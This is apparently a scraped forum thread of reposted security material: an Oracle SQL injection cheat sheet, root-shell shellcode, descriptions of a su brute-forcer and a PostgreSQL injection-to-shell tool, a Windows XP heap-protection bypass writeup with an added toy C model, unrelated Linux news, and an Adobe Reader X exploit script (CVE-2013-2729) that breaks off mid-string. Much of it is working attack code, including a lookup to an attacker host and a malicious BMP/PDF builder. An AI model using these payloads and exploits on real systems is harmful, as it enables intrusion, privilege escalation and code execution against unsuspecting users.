[TR] [TD]Select Nth Row[/TD] [TD]SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- gets 9th row (rows numbered from 1)[/TD] [/TR]
[TR] [TD]Select Nth Char[/TD] [TD]SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'[/TD] [/TR]
[TR] [TD]Bitwise AND[/TD] [TD]SELECT bitand(6,2) FROM dual; -- returns 2
SELECT bitand(6,1) FROM dual; -- returns 0[/TD] [/TR]
[TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT chr(65) FROM dual; -- returns A[/TD] [/TR]
[TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii('A') FROM dual; -- returns 65[/TD] [/TR]
[TR] [TD]Casting[/TD] [TD]SELECT CAST(1 AS char) FROM dual;
SELECT CAST('1' AS int) FROM dual;[/TD] [/TR]
[TR] [TD]String Concatenation[/TD] [TD]SELECT 'A' || 'B' FROM dual; -- returns AB[/TD] [/TR]
[TR] [TD]If Statement[/TD] [TD]BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn’t play well with SELECT statements[/TD] [/TR]
[TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2[/TD] [/TR]
[TR] [TD]Avoiding Quotes[/TD] [TD]SELECT chr(65) || chr(66) FROM dual; -- returns AB[/TD] [/TR]
[TR] [TD]Time Delay[/TD] [TD]BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
-- Also see Heavy Queries to create a time delay[/TD] [/TR]
[TR] [TD]Make DNS Requests[/TD] [TD]SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;[/TD] [/TR]
[TR] [TD]Command Execution[/TD] [TD]Java can be used to execute commands if it’s installed. ExtProc can sometimes be used too, though it normally failed for me.[/TD] [/TR]
[TR] [TD]Local File Access[/TD] [TD]UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it’s installed (it is not available in Oracle Express).[/TD] [/TR]
[TR] [TD]Hostname, IP Address[/TD] [TD]SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames[/TD] [/TR]
[TR] [TD]Location of DB files[/TD] [TD]SELECT name FROM V$DATAFILE;[/TD] [/TR]
[TR] [TD]Default/System Databases[/TD] [TD]SYSTEM
SYSAUX[/TD] [/TR]
[/TABLE]

[h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers.

From Christian Mehlmauer:
[TABLE]
[TR] [TD]Get all tablenames in one string[/TD] [TD]select rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()') ,',') from all_tables -- when using union based SQLI with only one row[/TD] [/TR]
[TR] [TD]Blind SQLI in order by clause[/TD] [TD]order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = 'a' and rownum = 1)=1) then column_name1 else column_name2 end -- you must know 2 column names with the same datatype[/TD] [/TR]
[/TABLE]

Source: Oracle SQL Injection Cheat Sheet | pentestmonkey
  10. setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

[CODE]
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the Nth Dimension nor the names of its contributors may
#   be used to endorse or promote products derived from this software without
#   specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
#
# setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

.text
.globl _start

_start:
        # uid = 0
        xor %edi, %edi                          # set %edi to 0

        # setuid
        mov $0x69, %al                          # set %al to 0x69 (setuid)
        syscall                                 # enter the kernel

        # *filename = "/bin//sh"
        xor %ax, %ax                            # set %ax to 0
        push %ax                                # push %ax on to the stack (string terminator)
        movq $0x68732f2f6e69622f, %rbx          # set %rbx to "hs//nib/"
        pushq %rbx                              # push %rbx on to the stack
        movq %rsp, %rdi                         # set %rdi to %rsp

        # **argv = [0, *filename]
        xorq %rcx, %rcx                         # set %rcx to 0
        pushq %rcx                              # push %rcx on to the stack
        pushq %rdi                              # push %rdi on to the stack
        movq %rsp, %rsi                         # set %rsi to %rsp

        # execve
        mov $0x3b, %al                          # set %al to 0x3b (execve)
        syscall                                 # enter the kernel
[/CODE]

I posted it because it is explained.

Source: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
  11. Breaking the links: Exploiting the linker

Abstract
The recent discussion relating to insecure library loading on the Microsoft Windows platform provoked a significant amount of debate as to whether GNU/Linux and UNIX variants could be vulnerable to similar attacks. Whilst the general consensus of the Slashdot herd appeared to be that this was just another example of Microsoft doing things wrong, I felt this was unfair and responded with a blog post [1] that sought to highlight an example of where POSIX style linkers get things wrong. Based on the feedback I received to that post, I decided to investigate the issue a little further. This paper is an amalgamation of what I learnt. As such it contains my own research, the discoveries of others and POSIX lore.

Contents
1 Technical Details
1.1 What is the linker?
1.1.1 The link editor
1.1.2 The runtime linker
1.2 The linker attack surface
1.2.1 The process of linking and executing
1.2.2 Environment
1.2.3 Files
1.2.4 issetugid() and friends
1.3 Real world exploitation
1.3.1 The runtime linker as an interpreter
1.3.2 The empty library
1.3.3 SIGSEGV'ing for 12 years
1.3.4 What's in your RPATH?
1.3.5 Debian makes me sad
1.3.6 If an environment variable is set but you don't trust it, is it still there?
1.3.7 Reflections on Trusting Trust revisited
1.3.8 Mapping NULL
1.4 Auditing scripts, binaries and source
1.4.1 Scripts
1.4.2 Binaries
1.4.3 Source
1.5 Further research
1.5.1 Other linkers
2 Changes

BTL.pdf (2547 downloads) © Tim Brown, License: n/a. Paper on exploiting linkers. Download BTL.pdf

Source: Nth Dimension/downloads:: Negatively discriminating against idiots since 1995!
  12. Nytro

sucrack

sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. This tool comes in handy as a final instance on a system where you do not have too many privileges but you are in the wheel group. Many su implementations require a pseudo terminal to be attached in order to take the password from the user. This is why you couldn't just use a simple shell script to do this work. This tool, written in C, is highly efficient and can attempt multiple logins at the same time. Please be advised that using this tool will take a lot of the CPU performance and fill up the logs quite quickly. sucrack is so far known to be running on FreeBSD, NetBSD and Linux.

Download

- sucrack-1.2.3.tar.gz (109 kb): README, ChangeLog
- sucrack-1.2.2.tar.gz (103 kb): README

Installation

Default installation:

    ./configure
    make
    make install

You have two further compiling flags:

Usage

In order to run sucrack, you need to specify a wordlist:

    sucrack wordlist.txt

Or advise it to read the passwords from stdin. In that case other tools with smart password generation algorithms can easily be used, for instance John The Ripper:

    john --stdout --incremental | sucrack -

You generally have two options for printing the progress and the statistics (if you have compiled sucrack with the `--enable-statistics' flag): either with ANSI escape codes, which makes it look nicer, or without. The -a flag indicates whether ANSI escape codes should be used or not.

Source and more information: leidecker.info
  13. A tool for exploiting SQL injections in PostgreSQL databases.

Download

- pgshell
- test-env.sh

Introduction

The pgshell Perl script exploits configuration weaknesses in the PostgreSQL database management system as they were described in the corresponding paper (Having Fun With PostgreSQL). It not only allows gathering target system and user information but also privilege escalation, execution of shell commands and uploading of binary files. The general usage of pgshell can be outlined in three steps:

1. gathering information
2. creating the system and the upload framework
3. launching a shell and uploading files

The minimal parameters are the target host and a request file. The request file contains the HTTP request to send to the server plus a tag <<INJECTION>> that indicates where to perform the SQL injection. A simple request file can look like this:

    GET /index.php?id=1;<<INJECTION>> HTTP/1.0

If not stated otherwise, every execution of pgshell reads from and writes to a session file. This way, information won't get lost and the process can be resumed at any time. Additionally, there are certain settings that can be made in order to work properly against the target system. If you wish to launch a shell or to upload files you need to know the path to the libc. Furthermore, for uploading files, pgshell creates a function which uses the libc function open. Two parameters are needed in order to successfully open a file. These values are the OR'ed (O_CREAT | O_APPEND | O_RDWR) and S_IRWXU. Find out what values those will be on your target system and put everything in an initial session file:

    =target.libc=/lib/libc.so.6
    =target.flag.open=522
    =target.flag.mode=448

Source and more information: leidecker.info
  14. This Week In CyanogenMod

July 19th, 2013 • Written by ciwrl

Week Ending: July 19, 2013 – Special SELinux Edition

"This Week in CyanogenMod" is an ongoing feature that aims to serve as a one-stop shop for weekly updates. Topics discussed are culled from our social media accounts, gerrit, status updates and general thoughts. This week was all about SELinux and adjusting our source to accommodate it.

What is SELinux?

The project's official description reads "SELinux is a security enhancement to Linux which allows users and administrators more control over access control." SELinux is a set of open-sourced and peer-reviewed changes to the core Android software stack to help prevent apps from performing malicious activities. This is done by establishing a set of policies that act as mandatory access controls (MAC). Depending on the policy, it can do things such as prevent apps from running or accessing specific data, to preventing root access altogether. SELinux has wide-scale adoption throughout the Linux landscape, with Fedora, Red Hat and others incorporating policies to better the system security. The default policies are usually written per distribution, by their maintainers – we have begun this process for CyanogenMod. We will be working on this policy creation in parallel to Google's own policies for Android, which we believe will be released with the Android 4.3 source; effectively getting us ahead of the eventual 4.3 source release. As this process is open source, policy creation and suggestions will be handled via our gerrit instance.

What it's not

SELinux is not a backdoor for government agencies to spy on you. It is not PRISM, PROMIS, CARNIVORE, The Great Firewall or any other ominous Big Brother-like initiative.

Access Control Modes

By default, we will be shipping with SELinux capabilities enabled in the kernel, but in a Permissive mode. What this means is that your phone will behave exactly as it currently does, with no noticeable change to the user. There are 3 modes in total: Enforcing, Permissive and Disabled. While in Enforcing mode, SELinux policies are enforced, preventing whatever causes a violation (i.e. su). Permissive mode logs policy violations, but does not prevent the activity that caused them. Disabled turns SELinux off. We are using Permissive mode as our default so we can come up with sensible policies. If you submit a log for us to analyze (via JIRA) for SELinux policy improvements, the logged exceptions will be of high value. This will be an ongoing process as we work to incorporate sensible policies for each device repo. As always our source is available on Github and patches will be peer reviewed via gerrit. For those more attuned to personal data security, you are welcome to watch and audit our efforts. For the rest of you, sit back and relax – no need for pitchforks.

Source: This Week In CyanogenMod | CyanogenMod
  15. Distribution Release: DEFT Linux 8

Stefano Fratepietro has announced the release of DEFT Linux 8, a Lubuntu-based distribution and live DVD featuring a collection of open-source tools for digital forensics and penetration testing: "Dear guys, we did our best to turn the DEFT 8 beta version into stable -- also by listening to your precious suggestions and feedback -- and here we are. You can download the DEFT 8 final stable ISO image (which now includes DART 2). The stable version has been checked against common bugs but we are human and pretty busy with our jobs so if we missed something, just drop a line to bug at deftlinux.net and we'll collect suggestions and bug fixes for the next release. A big thank you to the DEFT team and to all the supporters. Stay tuned, because much more is yet to come, such as the release of the DEFT 8 virtual appliance (a pre-configured virtual machine you will be able to launch on your workstation by means of VMware Workstation or VMPlayer or Virtualbox); the DEFT 8 user manual; the updated website." Here is the brief release announcement. Download: deft8.iso (2,764MB, MD5).

• 2013-07-20: Distribution Release: DEFT Linux 8
• 2013-07-01: Development Release: DEFT Linux 8 Beta
• 2012-10-23: Distribution Release: DEFT Linux 7.2
• 2012-04-02: Distribution Release: DEFT Linux 7.1
• 2012-02-01: Distribution Release: DEFT Linux 7
• 2012-01-14: Development Release: DEFT Linux 7 RC1

Source: Distribution Release: DEFT Linux 8 (DistroWatch.com News)
  16. Hacking XPath 2.0

Introducing XPath

XPath 1.0 is a well-supported and fairly old query language for selecting nodes in an XML document and returning a computed value from the selected nodes. There are plenty of libraries implementing full or basic support for XPath 1.0 in a huge variety of languages including Java, C/C++, Python, C#, Haskell, JavaScript and Perl. Using XPath 1.0 you can write simplistic queries that filter nodes within a single specified XML document. For example, given the XML document shown below, it would be trivial to check if a user existed and authenticate them based upon a supplied username and password.

Download: http://t.co/LUKlB73jhy
  17. SpiderFoot v2.0 Released

SpiderFoot is a free, open-source footprinting tool, enabling you to perform various scans against a given domain name in order to obtain information such as sub-domains, e-mail addresses, owned netblocks, web server versions and so on. The main objective of SpiderFoot is to automate the footprinting process to the greatest extent possible, freeing up a penetration tester's time to focus their efforts on the security testing itself.

Main features

- Fast, easy to use
- Highly configurable
- For Windows & Linux
- Create your own modules in Python

New in this release, which is actually a complete re-write of the version from 2005(!):

- Now runs on Windows as well as Linux, Solaris, *BSD (basically anything with Python should be fine)
- Scans are even more configurable than before
- All scan data stored locally in an SQLite database for querying, reporting and analysis
- Many more scans/tests included (GeoIP, URL linkage, web technology, port scans…)
- You can now easily extend functionality by writing your own modules in Python
- Completely new user interface, which is now entirely web-based
- Configuration state is stored between runs
- Scanning can be remotely controlled

Full Changelog: https://github.com/smicallef/spiderfoot/wiki/Release-Notes

More Information: SpiderFoot - The Open Source Footprinting tool

Download: http://sourceforge.net/projects/spiderfoot/files/

Source: SpiderFoot v2.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
  18. Android exploitation primers: lifting the veil on mobile offensive security (Vol. I)

Table of Contents

1 Overview
  1.1 On the usefulness of information leak vulnerabilities
2 Technical Details
  2.1 Motivation
  2.2 Pre-4.1 information leak exploitation
  2.3 Post-4.1 information leak exploitation
  2.4 Building your ROP chain dynamically
    2.4.1 Searching for the gadgets
    2.4.2 Building the ROP chain
    2.4.3 Identifying the Android version and JavaScript engine
  2.5 Case study: Leveraging CVE-2010-4577
    2.5.1 The bug
    2.5.2 Exploitation walk-through
  2.6 Mitigation
  2.7 Future work
3 Closing words
  3.1 Lessons learned
  3.2 To mobile device and software vendors
  3.3 An open letter for the exploit market
References

Download: https://subreption.com/site_media/uploads/reports/droidleak_release.pdf
  19. Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass

Author: Alexander Anisimov

Heap Overflow

Let's take a look at this pretty simple example of a vulnerable function:

As we can see here the vulner() function copies data from a string pointed to by str to an allocated memory block pointed to by buf, without a bounds check. A string larger than 127 bytes passed to it will thereby overwrite the data adjacent to this memory block (which is, actually, the header of the following memory block). The heap overflow exploitation scenario usually proceeds like this: if during the buffer overflow the neighboring block exists, and is free, then the Flink and Blink pointers are replaced (Fig. 5). At the precise moment of the removal of this free block from the doubly-linked freelist a write to an arbitrary memory location happens: for example, the Blink pointer could be replaced by the unhandled exception filter address (UEF -- UnhandledExceptionFilter), and Flink, accordingly, by the address of the instruction which will transfer the execution to the shellcode.

More detailed information about heap overflows is provided in the "Windows Heap Overflows" whitepaper (by David Litchfield, BlackHat 2004).

Fig. 1

In Windows XP SP2 the allocation algorithm was changed -- now, before the removal of a free block from the freelist, a pointer sanity check is performed with regard to the previous and next block addresses (safe unlinking, fig. 2):

Fig. 2

Then that block gets deleted from the list. The memory block header was changed as well, besides other things (fig. 7). A new one-byte-large 'cookie' field was introduced, which holds a unique precomputed token -- undoubtedly designed to ensure header consistency. This value is calculated from the header address and a pseudorandom number generated during the heap creation: the consistency of this token is checked only during the allocation of a free memory block and only after its deletion from the free list. If at least one of these checks fails the heap is considered destroyed and an exception follows.

The first weak spot -- the fact that the cookie gets checked at all only during free block allocation, and hence there are no checks upon block freeing. However, in this situation there is nothing you can do except changing the block size and placing it into an arbitrary freelist. And the second weak spot -- the manipulation of the lookaside lists doesn't assume any header sanity checking; there isn't even a simple cookie check there. Which, theoretically, results in the possibility to overwrite up to 1016 bytes in an arbitrary memory location. The exploitation scenario could proceed as follows: if, during the overflow, the adjacent memory block is free and is residing in the lookaside list, then it becomes possible to replace the Flink pointer with an arbitrary value. Then, if the memory allocation of this block happens, the replaced Flink pointer will be copied into the header of the lookaside list and during the next allocation HeapAlloc() will return this fake pointer. The prerequisite for successful exploitation is the existence of a free block in a lookaside list that neighbors the buffer we overflow. This technique was successfully tested by the MaxPatrol team in trying to exploit the heap buffer overflow vulnerability in the Microsoft Windows winhlp32.exe application using the advisory published by the xfocus team: http://www.xfocus.net/FLASHSKY/ICOEXP/INDEX.HTML

The effect of a successful attack:

- Arbitrary memory region write access (smaller or equal to 1016 bytes).
- Arbitrary code execution (appendix A).
- DEP bypass (DEP is Data Execution Prevention) (appendix .

Full article: http://bit.ly/ZTdhuM

Source: Positive Research Center: Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass
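Added example, not from the article or from Positive Research: a toy model of the freelist unlink the post describes, in plain C on a constructed circular list. The `LIST_ENTRY` struct, the list helpers and the `target`/`wanted` cells are assumptions standing in for the real heap header and the overwritten address; it contrasts the pre-SP2 unchecked unlink (one corrupted Blink becomes a pointer-sized write to a chosen location) with the SP2 safe-unlinking check that rejects the same corruption.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Minimal model of the Flink/Blink pair in a free heap block's header.
 * Constructed for this example; not Microsoft's code. */
typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} LIST_ENTRY;

/* Pre-SP2 behaviour: remove e from the doubly-linked list, trusting both pointers. */
static void unlink_unchecked(LIST_ENTRY *e)
{
    LIST_ENTRY *f = e->Flink, *b = e->Blink;
    b->Flink = f;   /* with an overwritten Blink this stores f at an attacker-chosen address */
    f->Blink = b;
}

/* SP2 safe unlinking: only unlink if both neighbours still point back at e. */
static bool unlink_safe(LIST_ENTRY *e)
{
    LIST_ENTRY *f = e->Flink, *b = e->Blink;
    if (f->Blink != e || b->Flink != e)
        return false;   /* the real heap treats this as corruption and raises an exception */
    b->Flink = f;
    f->Blink = b;
    return true;
}

/* Build a circular list head -> n1 -> n2 -> n3 -> head. */
static void list_init(LIST_ENTRY *head) { head->Flink = head->Blink = head; }
static void list_append(LIST_ENTRY *head, LIST_ENTRY *n)
{
    n->Flink = head;
    n->Blink = head->Blink;
    head->Blink->Flink = n;
    head->Blink = n;
}

/* Scenario from the text: an overflow of the block before n2 has replaced n2's
 * Blink with the address of 'target' (standing in for a slot such as the
 * UnhandledExceptionFilter pointer) and its Flink with the value to store there.
 * Returns 1 if the unchecked unlink wrote that value into target. */
int unchecked_unlink_writes_target(void)
{
    LIST_ENTRY head, n1, n2, n3, target = {NULL, NULL}, wanted = {NULL, NULL};
    list_init(&head); list_append(&head, &n1); list_append(&head, &n2); list_append(&head, &n3);
    n2.Blink = &target;   /* corrupted by the overflow */
    n2.Flink = &wanted;   /* corrupted by the overflow */
    unlink_unchecked(&n2);
    return target.Flink == &wanted;
}

/* Same corruption against safe unlinking: the back-pointer check fails and
 * nothing is written. Returns 1 if the unlink was refused and target is intact. */
int safe_unlink_rejects_corruption(void)
{
    LIST_ENTRY head, n1, n2, n3, target = {NULL, NULL}, wanted = {NULL, NULL};
    list_init(&head); list_append(&head, &n1); list_append(&head, &n2); list_append(&head, &n3);
    n2.Blink = &target;
    n2.Flink = &wanted;
    bool ok = unlink_safe(&n2);
    return !ok && target.Flink == NULL && target.Blink == NULL;
}

/* Sanity check: on an intact list the safe unlink succeeds and n1 <-> n3 are joined. */
int safe_unlink_accepts_intact(void)
{
    LIST_ENTRY head, n1, n2, n3;
    list_init(&head); list_append(&head, &n1); list_append(&head, &n2); list_append(&head, &n3);
    bool ok = unlink_safe(&n2);
    return ok && n1.Flink == &n3 && n3.Blink == &n1;
}

int main(void)
{
    printf("unchecked unlink overwrote target: %d\n", unchecked_unlink_writes_target());
    printf("safe unlink rejected corruption:   %d\n", safe_unlink_rejects_corruption());
    printf("safe unlink accepted intact list:  %d\n", safe_unlink_accepts_intact());
    return 0;
}
```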
  20. Adobe Reader X BMP/RLE heap corruption (CVE-2013-2729) / XFABMPExploit.py

```python
'''Title: Adobe Reader X BMP/RLE heap corruption
Product: Adobe Reader X
Version: 10.x
Product Homepage: adobe.com
Binary affected: AcroForm.api
Binary Version: 10.1.4.38
Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841

Configuration Requirements
-----------------------------------------
Default configuration.

Vulnerability Requirements
-----------------------------------------
None.

Vulnerability Description
-----------------------------------------
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image.
Arbitrary code execution in the context of the sandboxed process is proved possible after
a malicious embedded bmp image triggers a heap overflow.

Vulnerability WorkAround (if possible)
-----------------------------------------
Delete AcroForm.api
'''
from hashlib import md5
import sys, struct

######### Begin of the miniPDF
import zlib  # For constructing a minimal pdf file

## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
    def __init__(self):
        self.n=None
        self.v=None
    def __str__(self):
        raise Exception("Fail")

## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        if self.s:
            return "true"
        return "false"

## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "%s"%self.s

## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "(%s)"%self.s

## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">"

## A convenient type of literal Strings
class PDFOctalString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s="".join(["\\%03o"%ord(c) for c in s])
    def __str__(self):
        return "(%s)"%self.s

## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "/%s"%self.s

## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        assert type(s) == type([])
        self.s=s
    def append(self,o):
        self.s.append(o)
        return self
    def __str__(self):
        return "[%s]"%(" ".join([ o.__str__() for o in self.s]))

## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
    def __init__(self, d={}):
        PDFObject.__init__(self)
        self.dict = {}
        for k in d:
            self.dict[k]=d[k]
    def __iter__(self):
        for k in self.dict.keys():
            yield k
    def __iterkeys__(self):
        for k in self.dict.keys():
            yield k
    def __getitem__(self, key):
        return self.dict[key]
    def add(self,name,obj):
        self.dict[name] = obj
    def get(self,name):
        if name in self.dict.keys():
            return self.dict[name]
        else:
            return None
    def __str__(self):
        s="<<"
        for name in self.dict:
            s+="%s %s "%(PDFName(name),self.dict[name])
        s+=">>"
        return s

## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
    def __init__(self,d={},stream=""):
        PDFDict.__init__(self,d)
        self.stream=stream
        self.filtered=self.stream
        self.add('Length', len(stream))
        self.filters = []
    def appendFilter(self, filter):
        self.filters.append(filter)
        self._applyFilters()  #yeah every time .. so what!
    def _applyFilters(self):
        self.filtered = self.stream
        for f in self.filters:
            self.filtered = f.encode(self.filtered)
        if len(self.filters)>0:
            self.add('Length', len(self.filtered))
            self.add('Filter', PDFArray([f.name for f in self.filters]))
        #Add Filter parameters ?
    def __str__(self):
        self._applyFilters()  #yeah every time .. so what!
        s=""
        s+=PDFDict.__str__(self)
        s+="\nstream\n"
        s+=self.filtered
        s+="\nendstream"
        return s

## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
    def __init__(self):
        PDFObject.__init__(self)
    def __str__(self):
        return "null"

## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class UnResolved(PDFObject):
    def __init__(self,n,v):
        PDFObject.__init__(self)
        self.n=n
        self.v=v
    def __str__(self):
        return "UNRESOLVED(%d %d)"%(self.n,self.v)

class PDFRef(PDFObject):
    def __init__(self,obj):
        PDFObject.__init__(self)
        self.obj=[obj]
    def __str__(self):
        if len(self.obj)==0:
            return "null"
        return "%d %d R"%(self.obj[0].n,self.obj[0].v)

## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
    name = PDFName('FlateDecode')
    def __init__(self):
        pass
    def encode(self,stream):
        return zlib.compress(stream)
    def decode(self,stream):
        return zlib.decompress(stream)

## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
    def __init__(self,obfuscate=0):
        self.objs=[]
        self.info=None
        self.root=None
    def setRoot(self,root):
        self.root=root
    def setInfo(self,info):
        self.info=info
    def _add(self,obj):
        if obj.v!=None or obj.n!=None:
            raise Exception("Already added!!!")
        obj.v=0
        obj.n=1+len(self.objs)
        self.objs.append(obj)
    def add(self,obj):
        if type(obj) != type([]):
            self._add(obj);
        else:
            for o in obj:
                self._add(o)
    def _header(self):
        return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n"
    def __str__(self):
        doc1 = self._header()
        xref = {}
        for obj in self.objs:
            xref[obj.n] = len(doc1)
            doc1+="%d %d obj\n"%(obj.n,obj.v)
            doc1+=obj.__str__()
            doc1+="\nendobj\n"
        posxref=len(doc1)
        doc1+="xref\n"
        doc1+="0 %d\n"%(len(self.objs)+1)
        doc1+="0000000000 65535 f \n"
        for xr in xref.keys():
            doc1+= "%010d %05d n \n"%(xref[xr],0)
        doc1+="trailer\n"
        trailer = PDFDict()
        trailer.add("Size",len(self.objs)+1)
        if self.root == None:
            raise Exception("Root not set!")
        trailer.add("Root",PDFRef(self.root))
        if self.info:
            trailer.add("Info",PDFRef(self.info))
        doc1+=trailer.__str__()
        doc1+="\nstartxref\n%d\n"%posxref
        doc1+="%%EOF"
        return doc1
######### End of miniPDF

SLIDESIZE=0x12C

def mkBMP(payload, exception=True):
    bmp = ''
    #getInfoHeader
    bfType = 0x4d42
    assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043]  #0x4142: not supp
    bmp += struct.pack('<H', bfType)
    bfSize = 0
    bfOffBits = 0
    bmp += struct.pack('<L', bfSize)
    bmp += struct.pack('<H', 0)  #Reserved1
    bmp += struct.pack('<H', 0)  #Reserved2
    bmp += struct.pack('<L', bfOffBits)
    biSize = 0x40
    assert not biSize in [0x12]
    bmp += struct.pack('<L', biSize)
    biHeight = 1
    biWidth = SLIDESIZE  #size of texture structure LFH enabled
    biPlanes = 1
    biBitCount = 8
    biCompression = 1
    biSizeImage = 0
    biXPelsPerMeter = 0
    biYPelsPerMeter = 0
    biClrUsed = 2
    if biClrUsed >0xff:
        raise Exception("BUG!!!!")
    biClrImportant = 0
    bmp += struct.pack('<L', biWidth)
    bmp += struct.pack('<L', biHeight)
    bmp += struct.pack('<H', biPlanes)
    bmp += struct.pack('<H', biBitCount)
    bmp += struct.pack('<L', biCompression)
    bmp += struct.pack('<L', biSizeImage)
    bmp += struct.pack('<L', biXPelsPerMeter)
    bmp += struct.pack('<L', biYPelsPerMeter)
    bmp += struct.pack('<L', biClrUsed)
    bmp += struct.pack('<L', biClrImportant)
    bmp += 'A'*(biSize-0x40)  #pad
    numColors=biClrUsed
    if biClrUsed == 0 or biBitCount < 8:
        numColors = 1<<biBitCount;
    bmp += 'RGBA'*(numColors)  #pallete
    bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff)
    #while (len(bmp)+10)%0x400 != 0:
    #    bmp += '\x00\x02\x00\x00'
    assert len(payload) < 0x100 and len(payload) >= 3
    bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
    bmp += '\x00'+chr(len(payload))+payload
    if len(payload)&1 :
        bmp += 'P'
    if exception:
        bmp += '\x00\x02\x00\xff'*10  #getting the pointer outside the texture so it triggers an exception
        bmp += '\x00'+chr(10)+'X'*10
    else:
        bmp += '\x00\x01'
    #'\x04X'*(biWidth+2000)+"\x00\x02"
    return bmp

def UEncode(s):
    r = ''
    s += '\x00'*(len(s)%2)
    for i in range(0,len(s),2):
        r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0])
    return r
    r = ''
    for c in s:
        r+= '%%%02x'%ord(c)
    return r

def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'):
    xdp = '''
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
